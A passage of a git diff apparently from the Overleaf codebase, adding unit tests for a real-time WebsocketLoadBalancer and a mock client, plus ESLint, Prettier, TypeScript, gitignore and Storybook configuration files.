+          payload: [{ newAccessLevel: 'private' }],
+        }
+        describe('when the user is an invited member', function () {
+          const client = {
+            ol_context: {
+              is_invited_member: true,
+            },
+          }
+
+          it('should return false', function () {
+            expect(
+              this.WebsocketLoadBalancer.shouldDisconnectClient(client, message)
+            ).to.equal(false)
+          })
+        })
+
+        describe('when the user is not an invited member', function () {
+          const client = {
+            ol_context: {
+              is_invited_member: false,
+            },
+          }
+
+          it('should return true', function () {
+            expect(
+              this.WebsocketLoadBalancer.shouldDisconnectClient(client, message)
+            ).to.equal(true)
+          })
+        })
+      })
+
+      describe('when the new access level is "tokenBased"', function () {
+        const message = {
+          message: messageName,
+          payload: [{ newAccessLevel: 'tokenBased' }],
+        }
+
+        describe('when the user is an invited member', function () {
+          const client = {
+            ol_context: {
+              is_invited_member: true,
+            },
+          }
+
+          it('should return false', function () {
+            expect(
+              this.WebsocketLoadBalancer.shouldDisconnectClient(client, message)
+            ).to.equal(false)
+          })
+        })
+
+        describe('when the user is not an invited member', function () {
+          const client = {
+            ol_context: {
+              is_invited_member: false,
+            },
+          }
+
+          it('should return false', function () {
+            expect(
+              this.WebsocketLoadBalancer.shouldDisconnectClient(client, message)
+            ).to.equal(false)
+          })
+        })
+      })
+    })
+  })
+
+  describe('emitToRoom', function () {
+    beforeEach(function () {
+      return this.WebsocketLoadBalancer.emitToRoom(
+        this.room_id,
+        this.message,
+        ...Array.from(this.payload)
+      )
+    })
+
+    return it('should publish the message to redis', function () {
+      return this.ChannelManager.publish
+        .calledWith(
+          this.WebsocketLoadBalancer.rclientPubList[0],
+          'editor-events',
+          this.room_id,
+          JSON.stringify({
+            room_id: this.room_id,
+            message: this.message,
+            payload: this.payload,
+          })
+        )
+        .should.equal(true)
+    })
+  })
+
+  describe('emitToAll', function () {
+    beforeEach(function () {
+      this.WebsocketLoadBalancer.emitToRoom = sinon.stub()
+      return this.WebsocketLoadBalancer.emitToAll(
+        this.message,
+        ...Array.from(this.payload)
+      )
+    })
+
+    return it("should emit to the room 'all'", function () {
+      return this.WebsocketLoadBalancer.emitToRoom
+        .calledWith('all', this.message, ...Array.from(this.payload))
+        .should.equal(true)
+    })
+  })
+
+  describe('listenForEditorEvents', function () {
+    beforeEach(function () {
+      this.WebsocketLoadBalancer._processEditorEvent = sinon.stub()
+      return this.WebsocketLoadBalancer.listenForEditorEvents()
+    })
+
+    it('should subscribe to the editor-events channel', function () {
+      return this.WebsocketLoadBalancer.rclientSubList[0].subscribe
+        .calledWith('editor-events')
+        .should.equal(true)
+    })
+
+    return it('should process the events with _processEditorEvent', function () {
+      return this.WebsocketLoadBalancer.rclientSubList[0].on
+        .calledWith('message', sinon.match.func)
+        .should.equal(true)
+    })
+  })
+
+  return describe('_processEditorEvent', function () {
+    describe('with bad JSON', function () {
+      beforeEach(function () {
+        this.isRestrictedUser = false
+        this.SafeJsonParse.parse = sinon
+          .stub()
+          .callsArgWith(1, new Error('oops'))
+        return this.WebsocketLoadBalancer._processEditorEvent(
+          this.io,
+          'editor-events',
+          'blah'
+        )
+      })
+
+      return it('should log an error', function () {
+        return this.logger.error.called.should.equal(true)
+      })
+    })
+
+    describe('with a designated room', function () {
beforeEach(function () { + this.io.sockets = { + clients: sinon.stub().returns([ + { + id: 'client-id-1', + emit: (this.emit1 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-2', + emit: (this.emit2 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-1', + emit: (this.emit3 = sinon.stub()), + ol_context: {}, + }, // duplicate client + ]), + } + const data = JSON.stringify({ + room_id: this.room_id, + message: this.message, + payload: this.payload, + }) + return this.WebsocketLoadBalancer._processEditorEvent( + this.io, + 'editor-events', + data + ) + }) + + return it('should send the message to all (unique) clients in the room', function () { + this.io.sockets.clients.calledWith(this.room_id).should.equal(true) + this.emit1 + .calledWith(this.message, ...Array.from(this.payload)) + .should.equal(true) + this.emit2 + .calledWith(this.message, ...Array.from(this.payload)) + .should.equal(true) + return this.emit3.called.should.equal(false) + }) + }) // duplicate client should be ignored + + describe('with a designated room, and restricted clients, not restricted message', function () { + beforeEach(function () { + this.io.sockets = { + clients: sinon.stub().returns([ + { + id: 'client-id-1', + emit: (this.emit1 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-2', + emit: (this.emit2 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-1', + emit: (this.emit3 = sinon.stub()), + ol_context: {}, + }, // duplicate client + { + id: 'client-id-4', + emit: (this.emit4 = sinon.stub()), + ol_context: { is_restricted_user: true }, + }, + ]), + } + const data = JSON.stringify({ + room_id: this.room_id, + message: this.message, + payload: this.payload, + }) + return this.WebsocketLoadBalancer._processEditorEvent( + this.io, + 'editor-events', + data + ) + }) + + return it('should send the message to all (unique) clients in the room', function () { + this.io.sockets.clients.calledWith(this.room_id).should.equal(true) + this.emit1 + .calledWith(this.message, ...Array.from(this.payload)) + .should.equal(true) + this.emit2 + .calledWith(this.message, ...Array.from(this.payload)) + .should.equal(true) + this.emit3.called.should.equal(false) // duplicate client should be ignored + return this.emit4.called.should.equal(true) + }) + }) // restricted client, but should be called + + describe('with a designated room, and restricted clients, restricted message', function () { + beforeEach(function () { + this.io.sockets = { + clients: sinon.stub().returns([ + { + id: 'client-id-1', + emit: (this.emit1 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-2', + emit: (this.emit2 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-1', + emit: (this.emit3 = sinon.stub()), + ol_context: {}, + }, // duplicate client + { + id: 'client-id-4', + emit: (this.emit4 = sinon.stub()), + ol_context: { is_restricted_user: true }, + }, + ]), + } + const data = JSON.stringify({ + room_id: this.room_id, + message: (this.restrictedMessage = 'new-comment'), + payload: this.payload, + }) + return this.WebsocketLoadBalancer._processEditorEvent( + this.io, + 'editor-events', + data + ) + }) + + return it('should send the message to all (unique) clients in the room, who are not restricted', function () { + this.io.sockets.clients.calledWith(this.room_id).should.equal(true) + this.emit1 + .calledWith(this.restrictedMessage, ...Array.from(this.payload)) + .should.equal(true) + this.emit2 + .calledWith(this.restrictedMessage, ...Array.from(this.payload)) + .should.equal(true) + 
this.emit3.called.should.equal(false) // duplicate client should be ignored + return this.emit4.called.should.equal(false) + }) + }) // restricted client, should not be called + + describe('when emitting to all', function () { + beforeEach(function () { + this.io.sockets = { emit: (this.emit = sinon.stub()) } + const data = JSON.stringify({ + room_id: 'all', + message: this.message, + payload: this.payload, + }) + return this.WebsocketLoadBalancer._processEditorEvent( + this.io, + 'editor-events', + data + ) + }) + + return it('should send the message to all clients', function () { + return this.emit + .calledWith(this.message, ...Array.from(this.payload)) + .should.equal(true) + }) + }) + + describe('when it should disconnect one of the clients', function () { + const targetUserId = 'bbb' + const message = 'userRemovedFromProject' + const payload = [`${targetUserId}`] + const clients = [ + { + id: 'client-id-1', + emit: sinon.stub(), + ol_context: { user_id: 'aaa' }, + disconnect: sinon.stub(), + }, + { + id: 'client-id-2', + emit: sinon.stub(), + ol_context: { user_id: `${targetUserId}` }, + disconnect: sinon.stub(), + }, + { + id: 'client-id-3', + emit: sinon.stub(), + ol_context: { user_id: 'ccc' }, + disconnect: sinon.stub(), + }, + ] + beforeEach(function () { + this.io.sockets = { + clients: sinon.stub().returns(clients), + } + const data = JSON.stringify({ + room_id: this.room_id, + message, + payload, + }) + return this.WebsocketLoadBalancer._processEditorEvent( + this.io, + 'editor-events', + data + ) + }) + + it('should disconnect the matching client, while sending message to other clients', function () { + this.io.sockets.clients.calledWith(this.room_id).should.equal(true) + + const [client1, client2, client3] = clients + + // disconnecting one client + client1.disconnect.called.should.equal(false) + client2.disconnect.called.should.equal(true) + client3.disconnect.called.should.equal(false) + + // emitting to remaining clients + client1.emit + .calledWith(message, ...Array.from(payload)) + .should.equal(true) + client2.emit.calledWith('project:access:revoked').should.equal(true) // disconnected client should get informative message + client3.emit + .calledWith(message, ...Array.from(payload)) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/helpers/MockClient.js b/services/real-time/test/unit/js/helpers/MockClient.js new file mode 100644 index 0000000..61cde89 --- /dev/null +++ b/services/real-time/test/unit/js/helpers/MockClient.js @@ -0,0 +1,23 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
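+// MockClient stands in for a socket.io client in the unit tests above: the
+// side-effecting methods are sinon stubs, so tests can assert on calls
+// without a real socket. A small usage sketch (illustrative only):
+//
+//   const client = new MockClient()
+//   client.emit('otUpdateError', 'oops')
+//   client.emit.calledWith('otUpdateError') // => true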
+let MockClient
+const sinon = require('sinon')
+
+let idCounter = 0
+
+module.exports = MockClient = class MockClient {
+  constructor() {
+    this.ol_context = {}
+    this.join = sinon.stub()
+    this.emit = sinon.stub()
+    this.disconnect = sinon.stub()
+    this.id = idCounter++
+    this.publicId = idCounter++
+    this.joinLeaveEpoch = 0
+  }
+
+  // NOTE: no prototype methods are needed; join/emit/disconnect are
+  // per-instance sinon stubs assigned in the constructor.
+}
diff --git a/services/real-time/tsconfig.json b/services/real-time/tsconfig.json
new file mode 100644
index 0000000..d3fdd30
--- /dev/null
+++ b/services/real-time/tsconfig.json
@@ -0,0 +1,12 @@
+{
+  "extends": "../../tsconfig.backend.json",
+  "include": [
+    "app.js",
+    "app/js/**/*",
+    "benchmarks/**/*",
+    "config/**/*",
+    "scripts/**/*",
+    "test/**/*",
+    "types"
+  ]
+}
diff --git a/services/web/.eastrc b/services/web/.eastrc
new file mode 100644
index 0000000..ac757c1
--- /dev/null
+++ b/services/web/.eastrc
@@ -0,0 +1,5 @@
+{
+  "adapter": "./migrations/lib/adapter.mjs",
+  "migrationNumberFormat": "dateTime",
+  "migrationExtension": "mjs"
+}
diff --git a/services/web/.eslintignore b/services/web/.eslintignore
new file mode 100644
index 0000000..673c2a7
--- /dev/null
+++ b/services/web/.eslintignore
@@ -0,0 +1,12 @@
+# NOTE: changing paths may require updating them in the Makefile too.
+data/
+scripts/translations/.cache/
+node_modules
+frontend/js/vendor
+modules/**/frontend/js/vendor
+/public/
+frontend/js/features/source-editor/lezer-latex/latex.mjs
+frontend/js/features/source-editor/lezer-latex/latex.terms.mjs
+frontend/js/features/source-editor/lezer-bibtex/bibtex.mjs
+frontend/js/features/source-editor/lezer-bibtex/bibtex.terms.mjs
+frontend/js/features/source-editor/hunspell/wasm/hunspell.mjs
diff --git a/services/web/.eslintrc.js b/services/web/.eslintrc.js
new file mode 100644
index 0000000..3c672de
--- /dev/null
+++ b/services/web/.eslintrc.js
@@ -0,0 +1,495 @@
+module.exports = {
+  root: true,
+  parser: '@typescript-eslint/parser',
+  extends: [
+    'eslint:recommended',
+    'plugin:@typescript-eslint/recommended',
+    'standard',
+    'prettier',
+  ],
+  plugins: ['@overleaf'],
+  env: {
+    es2020: true,
+  },
+  settings: {
+    // Tell eslint-plugin-react to detect which version of React we are using
+    react: {
+      version: 'detect',
+    },
+  },
+  rules: {
+    'no-constant-binary-expression': 'error',
+
+    // do not allow importing of implicit dependencies.
+    'import/no-extraneous-dependencies': 'error',
+
+    '@overleaf/prefer-kebab-url': 'error',
+
+    // disable some TypeScript rules
+    '@typescript-eslint/no-var-requires': 'off',
+    '@typescript-eslint/no-unused-vars': 'off',
+    '@typescript-eslint/no-empty-function': 'off',
+    '@typescript-eslint/no-explicit-any': 'off',
+    '@typescript-eslint/no-this-alias': 'off',
+    '@typescript-eslint/no-non-null-assertion': 'off',
+    '@typescript-eslint/ban-ts-comment': 'off',
+
+    'no-use-before-define': 'off',
+    '@typescript-eslint/no-use-before-define': [
+      'error',
+      { functions: false, classes: false, variables: false },
+    ],
+    'react-hooks/exhaustive-deps': [
+      'warn',
+      {
+        additionalHooks: '(useCommandProvider)',
+      },
+    ],
+  },
+  overrides: [
+    // NOTE: changing paths may require updating them in the Makefile too.
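+    // Overrides cascade in order: a file matching several `files` globs gets
+    // the merged config, with later entries winning on conflicts. E.g. a
+    // hypothetical scripts/foo.mjs would pick up the Node env, the ES module
+    // rules and the backend-scripts restrictions defined below.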
+ { + // Node + files: [ + '**/app/src/**/*.{js,mjs}', + 'app.{js,mjs}', + 'i18next-scanner.config.js', + 'scripts/**/*.{js,mjs}', + 'webpack.config*.js', + ], + env: { + node: true, + }, + }, + { + // Test specific rules + files: ['**/test/**/*.*'], + plugins: ['mocha', 'chai-expect', 'chai-friendly'], + env: { + mocha: true, + }, + rules: { + // mocha-specific rules + 'mocha/handle-done-callback': 'error', + 'mocha/no-exclusive-tests': 'error', + 'mocha/no-global-tests': 'error', + 'mocha/no-identical-title': 'error', + 'mocha/no-nested-tests': 'error', + 'mocha/no-pending-tests': 'error', + 'mocha/no-skipped-tests': 'error', + 'mocha/no-mocha-arrows': 'error', + + // Swap the no-unused-expressions rule with a more chai-friendly one + 'no-unused-expressions': 'off', + 'chai-friendly/no-unused-expressions': 'error', + + // chai-specific rules + 'chai-expect/missing-assertion': 'error', + 'chai-expect/terminating-properties': 'error', + + // prefer-arrow-callback applies to all callbacks, not just ones in mocha tests. + // we don't enforce this at the top-level - just in tests to manage `this` scope + // based on mocha's context mechanism + 'mocha/prefer-arrow-callback': 'error', + + '@typescript-eslint/no-unused-expressions': 'off', + }, + }, + { + // ES specific rules + files: [ + '**/app/src/**/*.mjs', + 'modules/*/index.mjs', + 'app.mjs', + 'scripts/**/*.mjs', + 'migrations/**/*.mjs', + ], + excludedFiles: [ + // migration template file + 'migrations/lib/template.mjs', + ], + parserOptions: { + sourceType: 'module', + }, + plugins: ['unicorn'], + rules: { + 'import/no-unresolved': [ + 'error', + { + // eslint-plugin-import does not support exports directive in package.json + // https://github.com/import-js/eslint-plugin-import/issues/1810 + ignore: ['^p-queue$'], + }, + ], + 'import/extensions': [ + 'error', + 'ignorePackages', + { + js: 'always', + mjs: 'always', + }, + ], + 'unicorn/prefer-module': 'error', + 'unicorn/prefer-node-protocol': 'error', + }, + }, + { + // Backend specific rules + files: ['**/app/src/**/*.{js,mjs}', 'app.{js,mjs}'], + parserOptions: { + tsconfigRootDir: __dirname, + project: './tsconfig.backend.json', + }, + rules: { + // do not allow importing of implicit dependencies. + 'import/no-extraneous-dependencies': [ + 'error', + { + // do not allow importing of devDependencies. + devDependencies: false, + }, + ], + 'no-restricted-syntax': [ + 'error', + // do not allow node-fetch in backend code + { + selector: + "CallExpression[callee.name='require'] > .arguments[value='node-fetch']", + message: + 'Requiring node-fetch is not allowed in production services, please use fetch-utils.', + }, + // mongoose populate must set fields to populate + { + selector: + "CallExpression[callee.property.name='populate'][arguments.length<2]", + message: + "Populate without a second argument returns the whole document. Use populate('field',['prop1','prop2']) instead", + }, + // Require `new` when constructing ObjectId (For mongo + mongoose upgrade) + { + selector: + "CallExpression[callee.name='ObjectId'], CallExpression[callee.property.name='ObjectId']", + message: + 'Construct ObjectId with `new ObjectId()` instead of `ObjectId()`', + }, + // Require `new` when mapping a list of ids to a list of ObjectId (For mongo + mongoose upgrade) + { + selector: + "CallExpression[callee.property.name='map'] Identifier[name='ObjectId']:first-child, CallExpression[callee.property.name='map'] MemberExpression[property.name='ObjectId']:first-child", + message: + "Don't map ObjectId directly. 
Use `id => new ObjectId(id)` instead", + }, + // Catch incorrect usage of `await db.collection.find()` + { + selector: + "AwaitExpression > CallExpression > MemberExpression[property.name='find'][object.object.name='db']", + message: + 'Mongo find returns a cursor not a promise, use `for await (const result of cursor)` or `.toArray()` instead.', + }, + ], + '@typescript-eslint/no-floating-promises': [ + 'error', + { checkThenables: true }, + ], + }, + }, + { + // Backend scripts specific rules + files: ['**/scripts/**/*.js'], + rules: { + 'no-restricted-syntax': [ + 'error', + // Require `new` when constructing ObjectId (For mongo + mongoose upgrade) + { + selector: + "CallExpression[callee.name='ObjectId'], CallExpression[callee.property.name='ObjectId']", + message: + 'Construct ObjectId with `new ObjectId()` instead of `ObjectId()`', + }, + // Require `new` when mapping a list of ids to a list of ObjectId (For mongo + mongoose upgrade) + { + selector: + "CallExpression[callee.property.name='map'] Identifier[name='ObjectId']:first-child, CallExpression[callee.property.name='map'] MemberExpression[property.name='ObjectId']:first-child", + message: + "Don't map ObjectId directly. Use `id => new ObjectId(id)` instead", + }, + // Catch incorrect usage of `await db.collection.find()` + { + selector: + "AwaitExpression > CallExpression > MemberExpression[property.name='find'][object.object.name='db']", + message: + 'Mongo find returns a cursor not a promise, use `for await (const result of cursor)` or `.toArray()` instead.', + }, + ], + }, + }, + { + // Cypress specific rules + files: [ + 'cypress/**/*.{js,jsx,ts,tsx}', + '**/test/frontend/**/*.spec.{js,jsx,ts,tsx}', + ], + extends: ['plugin:cypress/recommended'], + }, + { + // Frontend test specific rules + files: ['**/frontend/**/*.test.{js,jsx,ts,tsx}'], + plugins: ['testing-library'], + extends: ['plugin:testing-library/react'], + rules: { + 'testing-library/no-await-sync-events': 'off', + 'testing-library/no-await-sync-queries': 'off', + 'testing-library/no-container': 'off', + 'testing-library/no-node-access': 'off', + 'testing-library/no-render-in-lifecycle': 'off', + 'testing-library/no-wait-for-multiple-assertions': 'off', + 'testing-library/no-wait-for-side-effects': 'off', + 'testing-library/prefer-query-by-disappearance': 'off', + 'testing-library/prefer-screen-queries': 'off', + 'testing-library/render-result-naming-convention': 'off', + }, + }, + { + // Frontend specific rules + files: [ + '**/frontend/js/**/*.{js,jsx,ts,tsx}', + '**/frontend/stories/**/*.{js,jsx,ts,tsx}', + '**/*.stories.{js,jsx,ts,tsx}', + '**/test/frontend/**/*.{js,jsx,ts,tsx}', + '**/test/frontend/components/**/*.spec.{js,jsx,ts,tsx}', + ], + env: { + browser: true, + }, + parserOptions: { + sourceType: 'module', + }, + plugins: ['jsx-a11y'], + extends: [ + 'plugin:react/recommended', + 'plugin:react-hooks/recommended', + 'plugin:jsx-a11y/recommended', + 'standard-jsx', + 'prettier', + ], + globals: { + __webpack_public_path__: true, + $: true, + ga: true, + }, + rules: { + // TODO: remove once https://github.com/standard/eslint-config-standard-react/issues/68 (support eslint@8) is fixed. 
+ // START: inline standard-react rules + // "react/jsx-no-bind": ["error", { + // "allowArrowFunctions": true, + // "allowBind": false, + // "ignoreRefs": true + // },], + 'react/no-did-update-set-state': 'error', + 'react/no-unused-prop-types': 'error', + 'react/prop-types': 'error', + // "react/react-in-jsx-scope": "error", + // END: inline standard-react rules + + 'react/no-unknown-property': [ + 'error', + { + ignore: ['dnd-container', 'dropdown-toggle'], + }, + ], + + 'react/jsx-no-target-blank': [ + 'error', + { + allowReferrer: true, + }, + ], + // Prevent usage of legacy string refs + 'react/no-string-refs': 'error', + + // Prevent curly braces around strings (as they're unnecessary) + 'react/jsx-curly-brace-presence': [ + 'error', + { + props: 'never', + children: 'never', + }, + ], + + // Don't import React for JSX; the JSX runtime is added by a Babel plugin + 'react/react-in-jsx-scope': 'off', + 'react/jsx-uses-react': 'off', + + // Allow functions as JSX props + 'react/jsx-no-bind': 'off', // TODO: fix occurrences and re-enable this + + // Fix conflict between prettier & standard by overriding to prefer + // double quotes + 'jsx-quotes': ['error', 'prefer-double'], + + // Override weird behaviour of jsx-a11y label-has-for (says labels must be + // nested *and* have for/id attributes) + 'jsx-a11y/label-has-for': [ + 'error', + { + required: { + some: ['nesting', 'id'], + }, + }, + ], + + // Require .jsx or .tsx file extension when using JSX + 'react/jsx-filename-extension': [ + 'error', + { + extensions: ['.jsx', '.tsx'], + }, + ], + 'no-restricted-syntax': [ + 'error', + // prohibit direct calls to methods of window.localStorage + { + selector: + "CallExpression[callee.object.object.name='window'][callee.object.property.name='localStorage']", + message: + 'Modify location via customLocalStorage instead of calling window.localStorage methods directly', + }, + ], + }, + }, + { + // Sorting for Meta + files: ['frontend/js/utils/meta.ts'], + rules: { + '@typescript-eslint/member-ordering': [ + 'error', + { interfaces: { order: 'alphabetically' } }, + ], + }, + }, + { + // React component specific rules + // + files: [ + '**/frontend/js/**/components/**/*.{js,jsx,ts,tsx}', + '**/frontend/js/**/hooks/**/*.{js,jsx,ts,tsx}', + ], + rules: { + '@overleaf/no-unnecessary-trans': 'error', + '@overleaf/should-unescape-trans': 'error', + + // https://astexplorer.net/ + 'no-restricted-syntax': [ + 'error', + // prohibit direct calls to methods of window.location + { + selector: + "CallExpression[callee.object.object.name='window'][callee.object.property.name='location']", + message: + 'Modify location via useLocation instead of calling window.location methods directly', + }, + // prohibit assignment to window.location + { + selector: + "AssignmentExpression[left.object.name='window'][left.property.name='location']", + message: + 'Modify location via useLocation instead of calling window.location methods directly', + }, + // prohibit assignment to window.location.href + { + selector: + "AssignmentExpression[left.object.object.name='window'][left.object.property.name='location'][left.property.name='href']", + message: + 'Modify location via useLocation instead of calling window.location methods directly', + }, + // prohibit using lookbehinds due to incidents with Safari simply crashing when the script is parsed + { + selector: 'Literal[regex.pattern=/\\(\\?<[!=]/]', + message: 'Lookbehind is not supported in older Safari versions.', + }, + // prohibit direct calls to methods of 
window.localStorage + // NOTE: this rule is also defined for all frontend files, but those rules are overriden by the React component-specific config + { + selector: + "CallExpression[callee.object.object.name='window'][callee.object.property.name='localStorage']", + message: + 'Modify location via customLocalStorage instead of calling window.localStorage methods directly', + }, + ], + }, + }, + // React + TypeScript-specific rules + { + files: ['**/*.tsx'], + rules: { + 'react/prop-types': 'off', + 'no-undef': 'off', + }, + }, + // TypeScript-specific rules + { + files: ['**/*.ts'], + rules: { + 'no-undef': 'off', + }, + }, + // JavaScript-specific rules + { + files: ['**/*.js'], + rules: { + '@typescript-eslint/no-require-imports': 'off', + }, + }, + { + files: ['scripts/ukamf/*.js'], + rules: { + // Do not allow importing of any dependencies unless specified in either + // - web/package.json + // - web/scripts/ukamf/package.json + 'import/no-extraneous-dependencies': [ + 'error', + { packageDir: ['.', 'scripts/ukamf'] }, + ], + }, + }, + { + files: ['scripts/learn/checkSanitize/*.js'], + rules: { + // The checkSanitize script is used in the dev-env only. + 'import/no-extraneous-dependencies': [ + 'error', + { + devDependencies: true, + packageDir: ['.', '../../'], + }, + ], + }, + }, + { + files: [ + // Backend: Use @overleaf/logger + // Docs: https://manual.dev-overleaf.com/development/code/logging/#structured-logging + '**/app/**/*.{js,cjs,mjs}', + 'app.{js,mjs}', + 'modules/*/*.{js,mjs}', + // Frontend: Prefer debugConsole over bare console + // Docs: https://manual.dev-overleaf.com/development/code/logging/#frontend + '**/frontend/**/*.{js,jsx,ts,tsx}', + // Tests + '**/test/**/*.{js,cjs,mjs,jsx,ts,tsx}', + ], + excludedFiles: [ + // Allow console logs in scripts + '**/scripts/**/*.js', + // Allow console logs in stories + '**/stories/**/*.{js,jsx,ts,tsx}', + // Workers do not have access to the search params for enabling ?debug=true. + // self.location.url is the URL of the worker script. + '*.worker.{js,ts}', + ], + rules: { + 'no-console': 'error', + }, + }, + ], +} diff --git a/services/web/.gitignore b/services/web/.gitignore new file mode 100644 index 0000000..8bd23b7 --- /dev/null +++ b/services/web/.gitignore @@ -0,0 +1,103 @@ +# Compiled source # +################### +*.com +*.class +*.dll +*.exe +*.o +*.so + +# Packages # +############ +# it's better to unpack these files and commit the raw source +# git has its own built in compression methods +*.7z +*.dmg +*.gz +*.iso +*.jar +*.rar +*.tar +*.zip + +# Logs and databases # +###################### +*.log +*.sql +*.sqlite + +# OS generated files # +###################### +.DS_Store? +ehthumbs.db +Icon? 
+Thumbs.db + +# allow "icons" +![Ii]cons + +node_modules/* +data/* +coverage + +cookies.txt +requestQueueWorker.js +TpdsWorker.js +BackgroundJobsWorker.js +UserAndProjectPopulator.coffee + +public/manifest.json + +public/js +public/minjs +public/stylesheets +public/fonts +public/images + +Gemfile.lock + +*.swp +.DS_Store + +docker-shared.yml + +config/*.coffee +!config/settings.defaults.coffee +!config/settings.webpack.coffee +config/*.js +!config/settings.defaults.js +!config/settings.webpack.js +!config/settings.overrides.saas.js +!config/settings.overrides.server-pro.js + +modules/**/Makefile + +# Precompiled pug files +**/app/views/**/*.js + +# Sentry secrets file (injected by CI) +.sentryclirc + +# via dev-environment +.npmrc + +# Intellij +.idea +.run + +# Cypress +cypress/screenshots/ +cypress/videos/ +cypress/downloads/ +cypress/results/ + +# Ace themes for conversion +frontend/js/features/source-editor/themes/ace/ + +# Compiled parser files +frontend/js/features/source-editor/lezer-latex/latex.mjs +frontend/js/features/source-editor/lezer-latex/latex.terms.mjs +frontend/js/features/source-editor/lezer-bibtex/bibtex.mjs +frontend/js/features/source-editor/lezer-bibtex/bibtex.terms.mjs + +!**/fixtures/**/*.log diff --git a/services/web/.nvmrc b/services/web/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/web/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/web/.prettierignore b/services/web/.prettierignore new file mode 100644 index 0000000..f4be187 --- /dev/null +++ b/services/web/.prettierignore @@ -0,0 +1,14 @@ +# NOTE: changing paths may require updating them in the Makefile too. +data/ +scripts/translations/.cache/ +node_modules +frontend/js/vendor +modules/**/frontend/js/vendor +public/js +public/minjs +frontend/stylesheets/components/nvd3.less +frontend/js/features/source-editor/lezer-latex/latex.mjs +frontend/js/features/source-editor/lezer-latex/latex.terms.mjs +frontend/js/features/source-editor/lezer-bibtex/bibtex.mjs +frontend/js/features/source-editor/lezer-bibtex/bibtex.terms.mjs +frontend/js/features/source-editor/hunspell/wasm/hunspell.mjs diff --git a/services/web/.prettierrc b/services/web/.prettierrc new file mode 100644 index 0000000..13e3186 --- /dev/null +++ b/services/web/.prettierrc @@ -0,0 +1,9 @@ +{ + "arrowParens": "avoid", + "jsxSingleQuote": false, + "semi": false, + "singleQuote": true, + "trailingComma": "es5", + "tabWidth": 2, + "useTabs": false +} diff --git a/services/web/.storybook/main.ts b/services/web/.storybook/main.ts new file mode 100644 index 0000000..ac1a922 --- /dev/null +++ b/services/web/.storybook/main.ts @@ -0,0 +1,129 @@ +import type { StorybookConfig } from '@storybook/react-webpack5' +import path from 'node:path' +import MiniCssExtractPlugin from 'mini-css-extract-plugin' + +const rootDir = path.resolve(__dirname, '..') + +// NOTE: must be set before webpack config is imported +process.env.OVERLEAF_CONFIG = path.join(rootDir, 'config/settings.webpack.js') + +function getAbsolutePath(value: string): any { + return path.dirname(require.resolve(path.join(value, 'package.json'))) +} + +const config: StorybookConfig = { + core: { + disableTelemetry: true, + }, + staticDirs: [path.join(rootDir, 'public')], + stories: [ + path.join(rootDir, 'frontend/stories/**/*.stories.{js,jsx,ts,tsx}'), + path.join(rootDir, 'modules/**/stories/**/*.stories.{js,jsx,ts,tsx}'), + ], + addons: [ + getAbsolutePath('@storybook/addon-links'), + getAbsolutePath('@storybook/addon-essentials'), + 
getAbsolutePath('@storybook/addon-interactions'), + getAbsolutePath('@storybook/addon-a11y'), + getAbsolutePath('@storybook/addon-webpack5-compiler-babel'), + { + name: getAbsolutePath('@storybook/addon-styling-webpack'), + options: { + rules: [ + { + test: /\.css$/, + use: [ + { loader: MiniCssExtractPlugin.loader }, + { loader: 'css-loader' }, + ], + }, + { + test: /\.less$/, + use: [ + { loader: MiniCssExtractPlugin.loader }, + { loader: 'css-loader' }, + { loader: 'less-loader' }, + ], + }, + { + // Pass Sass files through sass-loader/css-loader/mini-css-extract- + // plugin (note: run in reverse order) + test: /\.s[ac]ss$/, + use: [ + // Allows the CSS to be extracted to a separate .css file + { loader: MiniCssExtractPlugin.loader }, + // Resolves any CSS dependencies (e.g. url()) + { loader: 'css-loader' }, + // Resolve relative paths sensibly in SASS + { loader: 'resolve-url-loader' }, + { + // Runs autoprefixer on CSS via postcss + loader: 'postcss-loader', + options: { + postcssOptions: { + plugins: ['autoprefixer'], + }, + }, + }, + // Compiles Sass to CSS + { + loader: 'sass-loader', + options: { sourceMap: true }, // sourceMap: true is required for resolve-url-loader + }, + ], + }, + ], + plugins: [new MiniCssExtractPlugin()], + }, + }, + ], + framework: { + name: getAbsolutePath('@storybook/react-webpack5'), + options: {}, + }, + docs: { + autodocs: 'tag', + }, + babel: (options: Record<string, any>) => { + return { + ...options, + plugins: [ + // ensure that TSX files are transformed before other plugins run + ['@babel/plugin-transform-typescript', { isTSX: true }], + ...(options.plugins ?? []), + ], + } + }, + webpackFinal: storybookConfig => { + return { + ...storybookConfig, + resolve: { + ...storybookConfig.resolve, + fallback: { + ...storybookConfig.resolve?.fallback, + fs: false, + os: false, + module: false, + tty: require.resolve('tty-browserify'), + }, + extensions: ['.js', '.jsx', '.mjs', '.ts', '.tsx', '.json'], + alias: { + ...storybookConfig.resolve?.alias, + // custom prefixes for import paths + '@': path.join(rootDir, 'frontend/js/'), + }, + }, + module: { + ...storybookConfig.module, + rules: (storybookConfig.module?.rules ?? []).concat({ + test: /\.wasm$/, + type: 'asset/resource', + generator: { + filename: 'js/[name]-[contenthash][ext]', + }, + }), + }, + } + }, +} +export default config diff --git a/services/web/.storybook/manager.css b/services/web/.storybook/manager.css new file mode 100644 index 0000000..7a99a82 --- /dev/null +++ b/services/web/.storybook/manager.css @@ -0,0 +1,3 @@ +.sidebar-container a[title='Overleaf'] { + max-width: 100px; +} diff --git a/services/web/.storybook/manager.ts b/services/web/.storybook/manager.ts new file mode 100644 index 0000000..f5bdff6 --- /dev/null +++ b/services/web/.storybook/manager.ts @@ -0,0 +1,15 @@ +import { addons } from '@storybook/manager-api' +import { create } from '@storybook/theming/create' + +import './manager.css' + +import brandImage from '../public/img/ol-brand/overleaf.svg' + +const theme = create({ + base: 'light', + brandTitle: 'Overleaf', + brandUrl: 'https://www.overleaf.com', + brandImage, +}) + +addons.setConfig({ theme }) diff --git a/services/web/.storybook/preview.tsx b/services/web/.storybook/preview.tsx new file mode 100644 index 0000000..e3838a6 --- /dev/null +++ b/services/web/.storybook/preview.tsx @@ -0,0 +1,173 @@ +import type { Preview } from '@storybook/react' + +// Storybook 